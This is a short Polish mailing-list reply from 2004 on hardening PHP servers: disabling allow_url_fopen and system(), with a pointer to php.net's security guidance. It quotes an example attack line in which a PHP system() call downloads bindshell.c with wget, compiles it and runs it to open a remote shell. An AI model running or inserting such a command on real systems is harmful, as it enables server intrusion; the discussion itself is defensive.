Witam,
Dnia Wed, Feb 18, 2004 at 03:27:43PM CET, Adam Byrtek / alpha napisał:
> On Wed, Feb 18, 2004 at 12:45:05PM +0100, Tomasz T. Ciaszczyk wrote:
> > system("cd tmp;wget http://www.rootshell.com/bindshell.c;gcc bindshell.c;./a.out");
> ...
> > - zablokowanie fopena na zewnatrz w php (allow_url_fopen = Off)
>
> To dobry pomysl, ale nie chroni przed tym, o czym sam wspomniales,
> czyli uzyciem system(), jesli taka mozliwosc istnieje.
od tego jest dokument "security" na php.net ;>
(m.in. wylacza sie wogole system).
Pozdrawiam,
Tomasz T. Ciaszczyk
--
.: ciacho<at>ciacho.pl ciacho<at>jabber.org http://ciacho.pl :.
.: a real life to po prostu jeden z możliwych shellów. :.
.: Ten najgorszy. :.
.: -- Carramba in "CyberJoly Drim" :.
Attachment:
pgpOVyCuN_WLq.pgp
Description: PGP signature